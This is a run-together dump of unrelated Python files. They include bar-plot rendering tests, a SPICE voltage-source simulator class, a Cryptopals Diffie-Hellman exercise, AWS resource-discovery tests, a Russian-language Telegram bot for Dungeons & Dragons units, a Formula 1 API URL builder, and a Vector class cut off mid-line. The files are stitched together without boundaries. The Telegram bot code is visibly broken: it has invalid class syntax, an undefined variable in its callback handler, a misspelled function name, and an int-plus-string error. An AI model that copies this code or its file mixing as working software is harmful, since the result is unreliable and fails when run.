TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_thresh_rg.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_horiz.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotcomparedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'scaledTo100': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotcomparedstacked_horiz_100.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'figureSize': [10,10], 'horizontal': True, 'scaledTo100': True, 'filenamesRegexExtract': '([-+]\\d+)', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked_horiz_100.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG"""V (independant voltage source) device. Copyright 2014 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import math import subcircuit.interfaces as inter import subcircuit.sandbox as sb import subcircuit.stimuli as stim class V(inter.MNADevice, inter.CurrentSensor): """A SPICE Voltage source or current sensor.""" def __init__(self, nodes, value, res=0.0, induct=0.0, **kwargs): """Create a new SPICE Diode device instance. General form: VXXXXXXX N+ N- < DC/TRAN VALUE> >> + >> >> IYYYYYYY N+ N- < DC/TRAN VALUE> >> + >> >> Examples: VCC 10 0 DC 6 VIN 13 2 0.001 AC 1 SIN(0 1 1MEG) ISRC 23 21 AC 0.333 45.0 SFFM(0 1 10K 5 1K) VMEAS 12 9 VCARRIER 1 0 DISTOF1 0.1 -90.0 VMODULATOR 2 0 DISTOF2 0.01 IIN1 1 5 AC 1 DISTOF1 DISTOF2 0.001 N+ and N- are the positive and negative nodes, respectively. Note that voltage sources need not be grounded. Positive current is assumed to flow from the positive node, through the source, to the negative node. A current source of positive value forces current to flow out of the N+ node, through the source, and into the N- node. Voltage sources, in addition to being used for circuit excitation, are the 'ammeters' for SPICE, that is, zero valued voltage sources may be inserted into the circuit for the purpose of measuring current. They of course have no effect on circuit operation since they represent short-circuits. DC/TRAN is the dc and transient analysis value of the source. If the source value is zero both for dc and transient analyses, this value may be omitted. If the source value is time-invariant (e.g., a power supply), then the value may optionally be preceded by the letters DC. ACMAG is the ac magnitude and ACPHASE is the ac phase. The source is set to this value in the ac analysis. If ACMAG is omitted following the keyword AC, a value of unity is assumed. If ACPHASE is omitted, a value of zero is assumed. If the source is not an ac small-signal input, the keyword AC and the ac values are omitted. DISTOF1 and DISTOF2 are the keywords that specify that the independent source has distortion inputs at the frequencies F1 and F2 respectively (see the description of the .DISTO control line). The keywords may be followed by an optional magnitude and phase. The default values of the magnitude and phase are 1.0 and 0.0 respectively. Any independent source can be assigned a time-dependent value for transient analysis. If a source is assigned a time-dependent value, the time-zero value is used for dc analysis. There are five independent source functions: pulse, exponential, sinusoidal, piece-wise linear, and single-frequency FM. If parameters other than source values are omitted or set to zero, the default values shown are assumed. (TSTEP is the printing increment and TSTOP is the final time (see the .TRAN control line for explanation)). """ inter.MNADevice.__init__(self, nodes, 1, **kwargs) # determine type of value provided: if isinstance(value, inter.Stimulus): self.stimulus = value self.stimulus.device = self elif isinstance(value, float) or isinstance(value, int): self.stimulus = None self.value = float(value) self.res = res self.induct = induct self.value = value def connect(self): nplus, nminus = self.nodes self.port2node = {0: self.get_node_index(nplus), 1: self.get_node_index(nminus), 2: self.create_internal("{0}_int".format(self.name))} def start(self, dt): self.jac[0, 2] = 1.0 self.jac[1, 2] = -1.0 self.jac[2, 0] = 1.0 self.jac[2, 1] = -1.0 self.jac[2, 2] = -(self.res + self.induct / dt) volt = 0.0 if self.stimulus: volt = self.stimulus.start(dt) elif self.value: volt = self.value self.bequiv[2] = volt def step(self, dt, t): if self.stimulus: volt = self.stimulus.step(dt, t) else: volt = self.value if self.induct: il = self.get_across_history(2) volt += self.induct / dt * il self.bequiv[2] = volt def get_current_node(self): return self.port2node[2], -1.0 class VBlock(sb.Block): """Schematic graphical inteface for V device.""" # meta data: friendly_name = "Voltage Source (DC)" family = "Sources" label = "V" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # minus: symbol.lines.append(((55, 67), (65, 67))) # circle symbol.circles.append((60, 50, 30)) def __init__(self, name=""): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage (V)'] = 1.0 def get_engine(self, nodes): return V(nodes, self.properties['Voltage (V)']) class VSinBlock(sb.Block): friendly_name = "Voltage Source (Sine)" family = "Sources" label = "VSIN" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # circle symbol.circles.append((60, 50, 30)) # sine: a1 = math.pi a2 = 0.0 symbol.arcs.append((53, 58, 7, a1, a2, True)) symbol.arcs.append((67, 58, 7, -a1, -a2, False)) def __init__(self, name): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage Offset (V)'] = 0.0 self.properties['Voltage Amplitude (V)'] = 1.0 self.properties['Frequency (Hz)'] = 60.0 self.properties['Delay (s)'] = 0.0 self.properties['Damping factor (1/s)'] = 0.0 self.properties['Phase (rad)'] = 0.0 def get_engine(self, nodes): vo = self.properties['Voltage Offset (V)'] va = self.properties['Voltage Amplitude (V)'] freq = self.properties['Frequency (Hz)'] td = self.properties['Delay (s)'] theta = self.properties['Damping factor (1/s)'] phi = self.properties['Phase (rad)'] sin = stim.Sin(vo, va, freq, td, theta, phi) return V(nodes, sin) class VPulseBlock(sb.Block): friendly_name = "Voltage Source (Pulse)" family = "Sources" label = "VPULSE" engine = V symbol = sb.Symbol() # leads: symbol.lines.append(((60, 0), (60, 20))) symbol.lines.append(((60, 80), (60, 100))) # plus: symbol.lines.append(((60, 28), (60, 38))) symbol.lines.append(((55, 33), (65, 33))) # circle symbol.circles.append((60, 50, 30)) # pulse: symbol.lines.append(((45, 60), (55, 60), (55, 50), (65, 50), (65, 60), (75, 60))) def __init__(self, name): # init super: sb.Block.__init__(self, name, V) # ports: self.ports['positive'] = sb.Port(self, 0, (60, 0)) self.ports['negative'] = sb.Port(self, 1, (60, 100)) # properties: self.properties['Voltage 1 (V)'] = 0.0 self.properties['Voltage 2 (V)'] = 1.0 self.properties['Delay (s)'] = 0.0 self.properties['Rise Time (s)'] = 0.0 self.properties['Fall Time (s)'] = 0.0 self.properties['Width (s)'] = 0.01 self.properties['Period (s)'] = 0.02 def get_engine(self, nodes): v1 = self.properties['Voltage 1 (V)'] v2 = self.properties['Voltage 2 (V)'] td = self.properties['Delay (s)'] tr = self.properties['Rise Time (s)'] tf = self.properties['Fall Time (s)'] pw = self.properties['Width (s)'] per = self.properties['Period (s)'] pulse = stim.Pulse(v1, v2, td, tr, tf, pw, per) return V(nodes, pulse) # solution to http://cryptopals.com/sets/5/challenges/33 # implementation of Diffie-Hellman import random import hashlib def GetPublicKey(p, g, a): return pow(g, a, p) def GetSharedKeyVal(p, B, a): return pow(B, a, p) def GetSharedKey(p, B, a): s = GetSharedKeyVal(p, B, a) return hashlib.sha1(str(s).encode('utf-8')).hexdigest() p = 0xffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff g = 2 if __name__ == "__main__": a = random.randint(0, p - 1) A = GetPublicKey(p, g, a) b = random.randint(0, p - 1) B = GetPublicKey(p, g, b) key1 = GetSharedKey(p, B, a) print("Key 1: " + key1) key2 = GetSharedKey(p, A, b) print("Key 2: " + key2) if key1 == key2: print("Test succeeded!") else: print("Test failed.")bianjiang/tweeta """ tweeta ------- tweeta is a library for Python that helps to process data collected via Twitter APIs. Questions, comments? """ __version__ = '0.2.1' __author__ = ' <>' from .tweet import TweetaTweet from .exceptions import ( TweetaError )CloudWanderer-io/CloudWanderer import unittest from unittest.mock import ANY from cloudwanderer.boto3_services import Boto3Services from cloudwanderer.cloud_wanderer_resource import SecondaryAttribute from cloudwanderer.urn import URN from ..helpers import DEFAULT_SESSION, get_default_mocker from ..mocks import add_infra class TestCloudWandererBoto3Resource(unittest.TestCase): @classmethod def setUpClass(cls) -> None: get_default_mocker().start_general_mock(restrict_regions=["eu-west-2", "us-east-1", "ap-east-1"]) add_infra() cls.services = Boto3Services(boto3_session=DEFAULT_SESSION) cls.service = cls.services.get_service("ec2", region_name="eu-west-2") cls.iam_service = cls.services.get_service("iam", region_name="us-east-1") cls.s3_service = cls.services.get_service("s3", region_name="us-east-1") cls.resource = next(cls.service.get_resources("vpc")) cls.role_resource = next(cls.iam_service.get_resources("role")) cls.role_policy_resource = next(cls.role_resource.get_subresources()) cls.bucket_resources = list(cls.s3_service.get_resources("bucket")) @classmethod def tearDownClass(cls) -> None: get_default_mocker().stop_general_mock() def test_raw_data(self): assert self.resource.raw_data == { "CidrBlock": "172.31.0.0/16", "CidrBlockAssociationSet": [ { "AssociationId": ANY, "CidrBlock": "172.31.0.0/16", "CidrBlockState": {"State": "associated"}, } ], "DhcpOptionsId": ANY, "InstanceTenancy": "default", "Ipv6CidrBlockAssociationSet": [], "IsDefault": True, "State": "available", "Tags": [], "VpcId": ANY, } def test_normalised_raw_data(self): assert self.resource.normalised_raw_data == { "CidrBlock": "172.31.0.0/16", "CidrBlockAssociationSet": [ { "AssociationId": ANY, "CidrBlock": "172.31.0.0/16", "CidrBlockState": {"State": "associated"}, } ], "DhcpOptionsId": ANY, "InstanceTenancy": "default", "Ipv6CidrBlockAssociationSet": [], "IsDefault": True, "OwnerId": None, "State": "available", "Tags": [], "VpcId": ANY, } def test_resource_type(self): assert self.resource.resource_type == "vpc" def test_region_regional_resources(self): assert self.resource.region == "eu-west-2" def test_region_global_service_global_resources(self): resource_regions = [resource.region for resource in self.bucket_resources] assert sorted(resource_regions) == sorted(["us-east-1", "eu-west-2", "ap-east-1"]) def test_account_id(self): assert self.resource.account_id == "123456789012" def test_service(self): assert self.resource.service == "ec2" def test_id(self): assert self.resource.id.startswith("vpc-") def test_secondary_attribute_names(self): assert self.resource.secondary_attribute_names == ["vpc_enable_dns_support"] def test_subresource_types(self): assert self.role_resource.resource_map.subresource_types == ["role_policy"] def test_urn(self): assert isinstance(self.resource.urn, URN) assert str(self.resource.urn).startswith( "urn:aws:123456789012:eu-west-2:ec2:vpc" ), f"{str(self.resource.urn)} does not match 'urn:aws:123456789012:eu-west-2:ec2:vpc'" def test_get_secondary_attributes(self): result = next(self.resource.get_secondary_attributes()) assert isinstance(result, SecondaryAttribute) assert result["EnableDnsSupport"] == {"Value": True} def test_get_subresources(self): result = next(self.role_resource.get_subresources()) assert str(result.urn) == "urn:aws:123456789012:us-east-1:iam:role_policy:test-role/test-role-policy" assert result.raw_data == { "PolicyDocument": { "Statement": {"Action": "s3:ListBucket", "Effect": "Allow", "Resource": "arn:aws:s3:::example_bucket"}, "Version": "2012-10-17", }, "PolicyName": "test-role-policy", "ResponseMetadata": { "HTTPHeaders": {"server": "amazon.com"}, "HTTPStatusCode": 200, "RequestId": ANY, "RetryAttempts": 0, }, "RoleName": "test-role", } def test_secondary_attribute_models(self): assert [x.name for x in self.role_resource.secondary_attribute_models] == [ "RoleInlinePolicyAttachments", "RoleManagedPolicyAttachments", ] def test_is_subresource(self): assert not self.role_resource.is_subresource assert self.role_policy_resource.is_subresource def test_id_parts(self): assert self.role_resource.id_parts == ["test-role"] assert self.role_policy_resource.id_parts == ["test-role", "test-role-policy"] def test_parent_resource_type(self): assert self.role_resource.parent_resource_type == "" assert self.role_policy_resource.parent_resource_type == "role" def test_resource_type_pascal(self): assert self.role_resource.resource_type_pascal == "Role" assert self.role_policy_resource.resource_type_pascal == "RolePolicy" egor5q/dnd-fight # -*- coding: utf-8 -*- import os import telebot import time import random import threading from emoji import emojize from telebot import types from pymongo import MongoClient import traceback token = os.environ['TELEGRAM_TOKEN'] bot = telebot.TeleBot(token) client=MongoClient(os.environ['database']) db=client.dnd users=db.users nowid = db.nowid spells = db.spells spells.insert_one({}) if 'barbarian' not in spells.find_one({}): spells.update_one({},{'$set':{'barbarian':{}, 'bard':{}, 'fighter':{}, 'wizard':{}, 'druid':{}, 'cleric':{}, 'warlock':{}, 'monk':{}, 'paladin':{}, 'rogue':{}, 'ranger':{}, 'sorcerer':{}}}) if nowid.find_one({}) == None: nowid.insert_one({'id':1}) base = { 'units':{}, 'alpha_access':False, 'current_stat':None, 'current_unit':None, 'spells':{} } classes = ['bard', 'barbarian', 'fighter', 'wizard', 'druid', 'cleric', 'warlock', 'monk', 'paladin', 'rogue', 'ranger', 'sorcerer'] races = ['elf', 'human', 'tiefling', 'half-elf', 'halfling', 'half-orc', 'dwarf', 'gnome'] # rangee: [дальность_применения, тип_цели] # duration: 0, если мгновенное # damage: [3, 6] = 3d6 class Spell(lvl = 0, casttime = 1, rangee = {'distance':30, 'target_type': 'target'}, duration = 1, savethrow = 'dexterity', damage = [3, 6], heal = [0, 0], actions = ['damage']): def __init__(self): self.lvl = lvl self.casttime = casttime # действия self.range = rangee # футы self.duration = duration # минуты self.savethrow = savethrow self.damage = damage self.heal = heal self.actions = actions @bot.message_handler(commands=['addspell']) def addspell(m): user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return spell = createspell() users.update_one({'id':user['id']},{'$set':{'spells.'+str(spell['id']):spell}}) bot.send_message(m.chat.id, 'Вы успешно создали заклинание! Теперь настройте его (/set_spell).') @bot.message_handler(commands=['create_unit']) def createunit(m): user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return unit = createunit(user) users.update_one({'id':user['id']},{'$set':{'units.'+str(unit['id']):unit}}) bot.send_message(m.chat.id, 'Вы успешно создали юнита! Теперь настройте его (/set_stats).') @bot.message_handler(commands=['set_stats']) def set_stats(m): if m.chat.id != m.from_user.id: bot.send_message(m.chat.id, 'Можно использовать только в личке!') return user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return kbs = [] kb = types.InlineKeyboardMarkup() for ids in user['units']: unit = user['units'][ids] kbs.append(types.InlineKeyboardButton(text = unit['name'], callback_data = str(unit['id'])+' edit')) i = 0 nextt = False toadd=[] while i < len(kbs): if nextt == True: kb.add(*toadd) toadd = [] toadd.append(kbs[i]) nextt = False else: toadd.append(kbs[i]) if i%2 == 1: nextt = True i+=1 bot.send_message(m.chat.id, 'Выберите юнита, которого хотите отредактировать.', reply_markup=kb) @bot.message_handler(commands=['set_spell']) def set_stats(m): if m.chat.id != m.from_user.id: bot.send_message(m.chat.id, 'Можно использовать только в личке!') return user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return kbs = [] kb = types.InlineKeyboardMarkup() for ids in user['spells']: spell = user['spells'][ids] kbs.append(types.InlineKeyboardButton(text = spell['name'], callback_data = str(spell['id'])+' spell_manage')) i = 0 nextt = False toadd=[] while i < len(kbs): if nextt == True: kb.add(*toadd) toadd = [] toadd.append(kbs[i]) nextt = False else: toadd.append(kbs[i]) if i%2 == 1: nextt = True i+=1 bot.send_message(m.chat.id, 'Выберите спелл, который хотите отредактировать.', reply_markup=kb) @bot.message_handler(content_types = ['photo']) def msgsp(m): user = createuser(m) if user['current_stat'] != None and user['current_unit'] != None and m.from_user.id == m.chat.id: unit = user['units'][user['current_unit']] if user['current_stat'] == 'photo': users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']:m.photo[0].file_id}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, 'Новое фото установлено!') @bot.message_handler() def msgs(m): user = createuser(m) if user['current_stat'] != None and user['current_unit'] != None and m.from_user.id == m.chat.id: unit = user['units'][user['current_unit']] numbervalues = ['hp', 'maxhp', 'strenght', 'dexterity', 'constitution', 'intelligence', 'wisdom', 'charisma', 'armor_class', 'speed'] blist = ['inventory', 'spells', 'player', 'photo'] if user['current_stat'] not in blist: text = False if user['current_stat'] in numbervalues: test = True val = m.text if test: try: val = int(m.text) except: bot.send_message(m.chat.id, 'Нужно значение типа int!') return users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']:val}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, unit['name']+': успешно изменена характеристика "'+user['current_stat']+'" на "'+val+'"!') else: if user['current_stat'] == 'inventory': inv = [] t = m.text.split(', ') for ids in t: inv.append(ids) tt = '' for ids in inv: tt +=ids+', ' tt = tt[:len(tt)-2] users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']: inv}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, unit['name']+': инвентарь юнита успешно изменён на '+tt+'!') ########################################################## @bot.callback_query_handler(func=lambda call: True) def inline(call): user = createuser(call) if 'edit' in call.data: unit = user['units'][int(call.data.split(' ')[0])] if unit == None: bot.answer_callback_query(call.id, 'Такого юнита не существует!', show_alert = True) return kb = create_edit_kb(unit) bot.send_message(m.chat.id, 'Нажмите на характеристику для её изменения.', reply_markup=kb) elif 'change' in call.data and 'spell' not in call.data: blist = ['inventory', 'spells', 'player', 'photo'] numbervalues = ['hp', 'maxhp', 'strenght', 'dexterity', 'constitution', 'intelligence', 'wisdom', 'charisma', 'armor_class', 'speed', 'name'] what = call.data.split(' ')[1] unit = user['units'][int(call.data.split(' ')[2])] if unit == None: bot.answer_callback_query(call.id, 'Такого юнита не существует!', show_alert = True) return users.update_one({'id':user['id']},{'$set':{'current_unit':unit['id'], 'current_stat':what}}) if what not in blist: if what in numbervalues: bot.send_message(m.chat.id, 'Теперь пришлите мне новое значение характеристики "'+what+'".') else: if what == 'race': r = 'расы' alls = '' for ids in races: alls += '`'+ids+'` ' elif what == 'class': r = 'классы' alls = '' for ids in classes: alls += '`'+ids+'` ' bot.send_message(m.chat.id, 'Теперь пришлите мне новое значение характеристики "'+what+'".\n'+ 'Существующие '+r+': '+alls, parse_mode = 'markdown') else: if what == 'inventory': inv = '`' for ids in unit['inventory']: inv += ids+', ' inv = inv[:len(inv)-2] inv += '`' bot.send_message(m.chat.id, 'Теперь пришлите мне новый инвентарь, перечисляя предметы через запятую. Текущий '+ 'инвентарь: '+inv, parse_mode='markdown') elif what == 'photo': if unit['photo'] != None: bot.send_photo(m.chat.id, unit['photo'], caption = 'Текущая фотография юнита. Для изменения отправьте новое фото.') else: bot.send_message(m.chat.id, 'Фотография отсутствует. Для изменения отправьте новое фото.') ################################################ elif 'spell_manage' in call.data: spell = user['spells'][int(call.data.split(' ')[0])] if spell == None: bot.answer_callback_query(call.id, 'Такого спелла не существует!', show_alert = True) return kb = create_spell_kb(spell) bot.send_message(m.chat.id, 'Нажмите на характеристику для её изменения.', reply_markup=kb) def create_spell_kb(spell): kb = types.InlineKeyboardMarkup() kb.add(addkb(kb, 'Название: '+spell['name'], 'spell_change name '+str(spell['id']))) kb.add(addkb(kb, 'Классы: '+str(spell['classes']), 'spell_change classes '+str(spell['id']))) kb.add(addkb(kb, 'Описание: '+str(spell['description']), 'spell_change description '+str(spell['id']))) kb.add(addkb(kb, 'Уровень: '+str(spell['lvl']), 'spell_change lvl '+str(spell['id']))) kb.add(addkb(kb, 'Время каста: '+str(spell['casttime'])+' действий', 'spell_change casttime '+str(spell['id']))) kb.add(addkb(kb, 'Дальность применения: '+str(len(spell['range']))+' параметров', 'spell_change range '+str(spell['id']))) kb.add(addkb(kb, 'Длительность: '+str(spell['duration']), 'spell_change range '+str(spell['id']))) kb.add(addkb(kb, 'Спасбросок: '+str(spell['savethrow']), 'spell_change savethrow '+str(spell['id']))) kb.add(addkb(kb, 'Урон: '+str(spell['damage'][0])+'d'+str(spell['damage'][1]), 'spell_change damage '+str(spell['id']))) kb.add(addkb(kb, 'Лечение: '+str(spell['heal'][0])+'d'+str(spell['heal'][1]), 'spell_change heal '+str(spell['id']))) kb.add(addkb(kb, 'Эффекты спелла: '+str(len(spell['actions'])+' эффектов', 'spell_change actions '+str(spell['id']))) return kb def create_etit_kb(unit): player = users.find_one({'id':unit['player']}) if player != None: player = player['name']+' ('+str(player['id'])+')' kb = types.InlineKeyboardMarkup() kb.add(addkb(kb, 'Имя: '+unit['name'], 'change name '+str(unit['id']))) kb.add(addkb(kb, 'Класс: '+unit['class'], 'change class '+str(unit['id']))) kb.add(addkb(kb, 'Раса: '+unit['race'], 'change race '+str(unit['id']))) kb.add(addkb(kb, 'Хп: '+str(unit['hp']), 'change hp '+str(unit['id']))) kb.add(addkb(kb, 'Макс.хп: '+str(unit['maxhp']), 'change maxhp '+str(unit['id']))) kb.add(addkb(kb, 'Сила: '+str(unit['strenght']), 'change strenght '+str(unit['id']))) kb.add(addkb(kb, 'Ловкость: '+str(unit['dexterity']), 'change dexterity '+str(unit['id']))) kb.add(addkb(kb, 'Телосложение: '+str(unit['constitution']), 'change constitution '+str(unit['id']))) kb.add(addkb(kb, 'Интеллект: '+str(unit['intelligence']), 'change intelligence '+str(unit['id']))) kb.add(addkb(kb, 'Мудрость: '+str(unit['wisdom']), 'change wisdom '+str(unit['id']))) kb.add(addkb(kb, 'Харизма: '+str(unit['charisma']), 'change charisma '+str(unit['id']))) kb.add(addkb(kb, 'Класс брони: '+str(unit['armor_class']), 'change armor_class '+str(unit['id']))) kb.add(addkb(kb, 'Скорость (в футах): '+str(unit['speed']), 'change speed '+str(unit['id']))) kb.add(addkb(kb, 'Инвентарь: '+str(len(unit['inventory']))+' предметов', 'change inventory '+str(unit['id']))) kb.add(addkb(kb, 'Заклинания: '+str(len(unit['spells']))+' спеллов', 'change spells '+str(unit['id']))) kb.add(addkb(kb, 'Фото', 'change photo '+str(unit['id']))) return kb def createspell(): id=randomid() return { 'id':id, 'name':str(id), 'classes':['sorcerer', 'wizard'], 'description':'Описание спелла', 'lvl':0, 'casttime':1, 'range':{'distance':30, 'target_type': 'target'}, 'duration':1, 'savethrow':'dexterity', 'damage':[3, 6], 'heal':[0, 0], 'actions':['damage'] } def addkb(kb, text, calldata): return types.InlineKeyboardButton(text=text, callback_data = calldata) def createunit(user): maxx=20 minn=6 maxhp = random.randint(8, 20) return { 'id':randomid(), 'name':randomname(), 'class':randomclass(), 'race':randomrace(), 'hp':maxhp, 'maxhp':maxhp, 'strenght':random.randint(minn,maxx), 'dexterity':random.randint(minn,maxx), 'constitution':random.randint(minn,maxx), 'intelligence':random.randint(minn,maxx), 'wisdom':random.randint(minn,maxx), 'charisma':random.randint(minn,maxx), 'armor_class':random.randint(8,16), 'initiative':10, 'speed':30, 'photo':None, 'death_saves(success)':0, 'death_saves(fail)':0, 'spells':{}, 'inventory':[], 'current_weapon':None, 'owner':user['id'], 'player':None } def randomname(): names = ['', '', '', '', 'Холг', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'Вренн'] return random.choice(names) def randomclass(): return random.choice(classes) def randomrace(): return random.choice(races) def randomid(): id = nowid.find_one({})['id'] nowid.update_one({},{'$inc':{'id':1}}) return id+1 def createuser(m): user = users.find_one({'id':m.from_user.id}) if user == None: users.insert_one(createu(m)) user = users.find_one({'id':m.from_user.id}) return user def createu(m): d = {'id':m.from_user.id, 'name':m.from_user.first_name} for ids in base: d.update({ids:base[ids]}) return d def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None): return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup, parse_mode=parse_mode) for ids in users.find({}): for idss in base: if idss not in ids: users.update_one({'id':ids['id']},{'$set':{idss:base[idss]}}) print('7777') bot.polling(none_stop=True,timeout=600) StarostinV/plt-pack import sys from datetime import datetime as dt def get_metadata() -> dict: platform = sys.platform py_version = sys.version time = dt.utcnow().strftime('%d %B %Y %H:%M:%S') return dict(time=time, py_version=py_version, platform=platform) zmmaster/Formula1-DiscordBot0 import requests from requests.exceptions import HTTPError, ConnectionError, Timeout from datetime import date class UrlBuilder: base_url = "https://ergast.com/api/f1" today = date.today() current_year = today.year earliest_year = 1950 first_rnd = 1 last_rnd = 22 @staticmethod def season_checker(season, keyword=True): if keyword: if (season == "current"): return True return False elif ((UrlBuilder.earliest_year < season and season < UrlBuilder.current_year) and (f"{season}".isdigit())): return True else: return False @staticmethod def rnd_checker(rnd, keyword=True): if keyword: if (rnd == "next" or rnd == "last"): return True return False elif ((UrlBuilder.first_rnd < rnd and rnd < UrlBuilder.last_rnd) and (f"{rnd}".isdigit())): return True else: return False @staticmethod def is_alpha(endpoint_variable): return (f"{endpoint_variable}".isalpha()) @staticmethod def correct_format_helper(season, rnd): seasonkeyword = UrlBuilder.is_alpha(season) rndkeyword = UrlBuilder.is_alpha(rnd) return (UrlBuilder.season_checker(season, seasonkeyword) and UrlBuilder.rnd_checker(rnd, rndkeyword)) def url_builder(season="current", rnd="next"): endpoint = f"{UrlBuilder.base_url}/{season}/{rnd}.json" return endpoint class SendRequest: def make_request(endpoint): """ The exception format below was borrowed from an article on Real Python Link: https://realpython.com/python-requests/ Title: Python's Requests Library (Guide) Article author: """ try: r = requests.get(endpoint, timeout=5) # If the response was succesful, no Exception will be raised r.raise_for_status() except HTTPError as http_err: print(f'Http error occured: {http_err}') except ConnectionError as conct_err: print(f'Connection Error occured: {conct_err}') except Timeout as tout_err: print(f'Timeout Error occured: {tout_err}') except Exception as err: print(f'Other error occurred: {err}') else: print('Success!') if (__name__ == '__main__'): pass from math import pi, cos, sin class Vector: def __init__(self, x, y): self.x = x self.y = y def __add__(self, v): if not isinstance(v, Vector): return NotImplemented return Vector(self.x + v.x, self.y + v.y) def __sub__(self, v): if not isinstance(v, Vector): return NotImplemented return Vector(self.x - v.x, self.y - v.y) def cross(self, v): if not 